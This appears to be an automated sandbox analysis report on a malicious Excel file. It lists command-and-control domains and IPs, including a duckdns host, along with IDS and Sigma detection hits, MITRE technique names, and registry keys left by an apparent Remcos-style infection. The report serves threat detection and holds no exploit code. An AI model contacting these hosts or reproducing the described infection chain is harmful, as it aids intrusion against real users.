Name:	2024remcmon.duckdns.org
IP:	192.210.214.9
TargetID:	14
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
Suricata IDS alerts for network traffic	Networking
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Uses dynamic DNS services	Networking	Application Layer Protocol
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

geoplugin.net

178.237.33.50

Details

Name:	geoplugin.net
IP:	178.237.33.50
TargetID:	14
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Suricata IDS alerts with low severity for network traffic	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

207.241.232.154

ia803104.us.archive.org

United States

Details

IP:	207.241.232.154
TargetID:	13
Current Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	7941
ASN name:	INTERNET-ARCHIVEUS
Private:	false
Domain:	ia803104.us.archive.org

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking

192.210.214.9

2024remcmon.duckdns.org

United States

Details

IP:	192.210.214.9
TargetID:	14
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Country:	United States
Countrycode:	USA
ASN number:	36352
ASN name:	AS-COLOCROSSINGUS
Private:	false
Domain:	2024remcmon.duckdns.org

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking

88.99.66.38

zhort.de

Germany

Details

IP:	88.99.66.38
TargetID:	0
Current Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Country:	Germany
Countrycode:	DEU
ASN number:	24940
ASN name:	HETZNER-ASDE
Private:	false
Domain:	zhort.de

Signature Hits	Behavior Group	Mitre Attack
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Sigma detected: Excel Network Connections	System Summary
Sigma detected: Suspicious Office Outbound Connections	System Summary
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

107.172.31.21

unknown

United States

Details

IP:	107.172.31.21
TargetID:	0
Current Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Country:	United States
Countrycode:	USA
ASN number:	36352
ASN name:	AS-COLOCROSSINGUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: EQNEDT32.EXE connecting to internet	Exploits
Suricata IDS alerts for network traffic	Networking
Office equation editor establishes network connection	Exploits	Exploitation for Client Execution
Sigma detected: Equation Editor Network Connection	System Summary
HTTP GET or POST without a user agent	Networking
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

178.237.33.50

geoplugin.net

Netherlands

Details

IP:	178.237.33.50
TargetID:	14
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Country:	Netherlands
Countrycode:	NLD
ASN number:	8455
ASN name:	ATOM86-ASATOM86NL
Private:	false
Domain:	geoplugin.net

Signature Hits	Behavior Group	Mitre Attack
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Suricata IDS alerts with low severity for network traffic	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\Software\Rmc-R2I0JW

exepath

HKEY_CURRENT_USER\Software\Rmc-R2I0JW

licence

HKEY_CURRENT_USER\Software\Rmc-R2I0JW

time

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

h+/

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel

Enabled

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel

MTTT

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle

ReviewToken

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

u1/

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents

LastPurgeTime

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU

Max Display

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Max Display

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 1

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 2

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 3

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 4

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 5

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 6

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 7

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 8

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 9

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 10

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 11

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 12

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 13

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 14

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 15

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 16

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 17

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 18

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 19

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru

Item 20

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3D0D6

3D0D6

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage

EXCELFiles

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage

ProductFiles

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage

VBAFiles

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

SavedLegacySettings

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C

Blob

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

k#1

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word

Enabled

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word

MTTT

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

t$1

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache

Version

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache

Count

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

Type

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

Protocol

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

Version

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

Flags

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

CobaltMajorVersion

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

CobaltMinorVersion

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

MsDavExt

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

Expiration

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://zhort.de/

EnableBHO

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

)r1

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Max Display

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Item 1

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Max Display

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 1

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 2

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 3

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 4

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 5

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 6

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 7

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 8

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 9

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 10

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 11

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 12

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 13

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 14

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 15

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 16

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 17

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 18

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 19

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 20

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 21

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Max Display

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 1

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 2

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 3

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 4

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 5

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 6

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 7

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 8

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 9

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 10

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 11

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 12

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 13

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 14

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 15

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 16

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 17

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 18

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 19

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 20

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru

Item 21

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\388CF

388CF